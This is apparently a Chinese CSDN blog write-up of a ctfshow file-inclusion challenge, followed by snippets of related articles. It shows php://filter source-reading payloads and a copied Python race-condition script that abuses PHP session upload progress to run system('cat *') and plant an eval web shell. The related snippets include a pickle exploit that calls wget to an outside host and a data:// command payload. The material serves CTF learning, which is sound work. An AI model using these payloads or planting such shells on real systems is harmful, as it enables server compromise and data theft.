ctfshow做题记录

最新推荐文章于 2024-04-27 04:51:08 发布
最新推荐文章于 2024-04-27 04:51:08 发布
阅读量365 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windcandy/article/details/128071468
版权

 打开题目发现只有username/password error这样一段话

查看源码

得知secret在和name拼接hash后要和pass一样

http://13eaf52b-e0b6-4db1-b8cd-5aaed9ab664c.challenge.ctf.show/?name=admin&pass=de73312423b835b22bfdc3c6da7b63e9

抓包后发现有提示flflflflag.php

 然后访问

?file=php://filter/convert.base64-encode/resource=index.php
?file=php://filter/convert.base64-encode/resource=flflflflag.php

得到源码

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>yesec want Girl friend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
<?php
include 'config.php';
@$name=$_GET['name'];
@$pass=$_GET['pass'];
if(md5($secret.$name)===$pass){
	echo '<script language="javascript" type="text/javascript">
           window.location.href="flflflflag.php";
	</script>
';
}else{
	setcookie("Hash",md5($secret.$name),time()+3600000);
	echo "username/password error";
}
?>
<html>
<!--md5($secret.$name)===$pass -->
</html>

然后就涉及知识盲区了,去搜了搜题解得知要写一个脚本代码直接抄的题解

import io
import sys
import requests
import threading

host = 'http://5d6bb0b0-e82d-4a68-b50b-8fd858a7c6ea.chall.ctf.show/flflflflag.php'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file":('a.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
        # if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)
 

等有时间再回过头看看这个题

唐飛玉
关注
ctfshow web入门 sql注入做题记录
ashMOB的博客
11-12 1110
ctfshow web入门 sql注入 前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshow sql注入 sql注入的产生: php中对数据库的操作非常简化,只需要一串sql语句的字符串,之后将这个字符串传入mysql_query这个函数就能进行数据库的操作,因而如果对用户传入的参数不进行严格的过滤,或者通过预处理之类的手段严格限制传入的参数,就会造成sql注入漏洞,执行用户自定义的sql语句。 MySQL5注入的一般流程: 获取字
CTFSHOW 文件上传(学习记录
ximo的博客
02-16 825
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
[NPUCTF2020]ezinclude 1
Kradress的博客
12-08 3254
目录源码思路总结 源码 username/password error<html> <!--md5($secret.$name)===$pass --> </html> 思路 根据提示,先抓个包发现cookie里面有值 Hash=fa25e54758d5d5c1927781a6ede89f8a 根据md5($secret.$name)===$pass猜得这个应该为name的md5加密后的值,所以pass=fa25e54758d5d5c1927781a6ede89
[NPUCTF2020]ezinclude 文件包含两大 getshell方式
m0_64180167的博客
10-11 1094
说一下我的思路吧robots没有扫描发现存在 dir.php然后404.html 报错这个又正好存在漏洞 所以前面全去看这个了结果根本不是这样做。。。正确的思路是这样发现变量 认为是 name和 pass传递参数或者通过爆破 但是太慢了我们可以抓包测试发现了 hash 因为提示我们MD5 所以我们需要注意然后我们传递一个?name=2发现hash变了 这里我们就多半能确定 cookie是我们的pass因为 name改变 cookie也改变 然后都是hash值。
CTF-web 第一部分 MD5
iamsongyu的博客
10-08 8617
一. 哈希解密与攻击 哈希就是把任意长度的输入(又叫做预映射pre-image)通过散列算法变换成固定长度的输出,通常用来进行文件摘要或者信息加密。虽说很难具有相同哈希的文件,但是某些特意构造的 信息还是会满足相同的哈希,而且有些时候可以使用字典的方式进行解密和使用哈希攻击。 0x00 SHA $_GET['name'] == $_GET['password'] sha1($_GET['n...
[NPUCTF2020]ezinclude
qq_62046696的博客
10-28 856
burp抓包cookie多了,hash值,然后当我们get上传一个name的值,这个Hash的值就会改变,所以直接上传显示出了flflflflflag.php,访问这个界面直接超链接到了404,如果浏览器直接访问那就直接就是报错界面,还好我们用的burp,然后include包含文件,正好包含以下index.php看一下源码php://filter伪协议读取额没啥用,思路又断了,看了师傅的wp发现这时候没思路就需要看一下php版本是否有没有漏洞。
linux密码 hash,实验吧Web-中-让我进去(Hash长度扩展攻击、加盐密码及Linux下hashpump的安装使用)...
weixin_42407741的博客
05-02 255
打开网页,测试开始,注入费老大劲,看了大佬的blog才知道怎么干。bp抓包,观察发现cookie中有个source=0,在repeater中修改为source=1,然go一下,出来了一段源代码。$flag = "XXXXXXXXXXXXXXXXXXXXXXX";$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for...
ctfshow python反序列化 刷题记录
最新发布
m0_61330806的博客
04-27 695
r=requests.get(url=url,params=params) print(r.text) nc -lvnp 1234 import os import pickle import base64 import requestsclass exp(object): def __reduce__(self): payload = ‘wget http://requestbin.cn:80/1cpartx1?a=’ return (os.popen,(payload,))a=exp() b=pickl
CTFshow——DJBCTF(比赛记录之摸鱼的代价)
Npceer-一位网安初学者的博客
01-24 838
目录:没有(因为没怎么打,总共就写了几题) 这大吉杯挺不错的 就是我不行 我的水平 由于摸鱼等原因 与2个月前的HECTF 几乎没有变化 虽然我以为会有变化的 我都不敢说我是个web入门的萌新 这veryphp这么多写出来的 我看到一堆waf直接跑路了 MISC 也是在各种hint下 才能勉强切出几题 属实太菜了 我3个月的门 入的不如别人半个月 这个博客为了监督自己不摸鱼而记 也顺便记一下这几题misc 因为挺好玩的 我的签到!:手撕拼图yyds 第一次 照着群里大佬给的原图去拼 然后感觉时间不够直
ctfshow_2021月饼杯记录
MiGooli的博客
09-21 1791
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
MD5加密及Hash长度拓展攻击【通俗易懂】
weixin_30648963的博客
01-24 858
先放一个简单点的利用了Hash长度拓展攻击的题目 if($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) { echo "Congratulations! You are a registered user.\n"; die ("The flag is ". $flag)...
CTF-[Web] MD5解题思路
weixin_54438700的博客
04-19 7318
最近练习了一些CTF中关于md5绕过的题目,总结了几种思路,本质没有太大变化,就是各种组合绕过,也是比较考察基础的,前段时间太摆烂了,好久没有更新了,革命尚未成功,同志仍需努力!!!
MD5算法
m0_37925407的博客
11-18 787
应用: 用于密码管理 当我们需要保存某些密码信息以用于身份确认时,如果直接将密码信息以明码方式保存在数据库中,不使用任何保密措施,系统管理员就很容易能得到原来的密码信息,这些信息一旦泄露, 密码也很容易被破译。为了增加安全性,有必要对数据库中需要保密的信息进行加密,这样,即使有人得到了整个数据库,如果没有解密算法,也不能得到原来的密码信息。MD5算法可以很好地解决这个问题,因为它可以将任意长度的输入串经过计算得到固定长度的输出,而且只有在明文相同的情况下,才能等到相同的密文,并且这个算法是不可逆的,即便
每天一道CTF 第二天
scrawman的博客
03-01 837
今天这个题目很简单,但我还是做了好久。有一些payload之前试了没成功后面再试又可以了,搞得我也很疑惑,不知道自己是不是之前引号没打对还是空格没打对。 进入正题: [极客大挑战 2019]EasySQL 题目就告诉我们了是要SQL注入 在用户名和密码分别输入admin’,password,报错显示如下 admin,password’,报错显示如下 admin’,password’,报错显示如下 结合三种情况来看,username使用的是单引号,password使用的是双引号。或者再用admin'#
代码审计_md5()函数
weixin_30875157的博客
02-15 137
题目链接:https://ctf.bugku.com/challenges 题解: 打开题目 其PHP代码如下: 代码相关知识点链接如下: error_reporting() 函数:http://www.w3school.com.cn/php/func_error_reporting.asp 比较运算符(== 和 ===):http://www.php.net/ma...
php 弱类型总结
Berry2014的博客
04-21 608
0x01 前言 最近CTF比赛,不止一次的出了php弱类型的题目,借此想总结一下关于php弱类型以及绕过方式 0x02 知识介绍 php中有两种比较的符号 == 与 === 1 <?php 2 $a = $b ; 3 $a===$b ; 4 ?> === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串...
ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 5406
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
php MD5值比较绕过
海纳百川
05-31 8279
php MD5值比较绕过 关于 md5() 函数 在 php 程序中,md5($string,bool): 得到一个字符串散列值。其中第二个参数默认为false,表示该函数返回值是32个字符的十六进制数。若指定为true,则表示函数返回的是16字节的二进制格式(这样通过浏览器解析会出现乱码)。 == 绕过 示例: if($_POST['a'] != $_POST['b']&& md5($_POST['a']) == md5($_POST['b'])) { echo $flag; }
ctfshow web签到题
09-12
ctfshow-web中的"web签到题"是其中的一道题目。具体信息如下: 请注意,网站的内容中包含了一个URL:/?url=data://text/plain,<?php system("cat ctf_go_go_go"); ?> 。这个URL可能与web签到题有关。 此外,网站中还包含了一个meta标签:<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 。这个标签指定了网页的字符编码格式。 综上所述,您可以尝试访问ctfshow-web,并查找与web签到题相关的内容。您可以注意URL和meta标签中的信息,这可能有助于解决这道题目。祝您好运!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值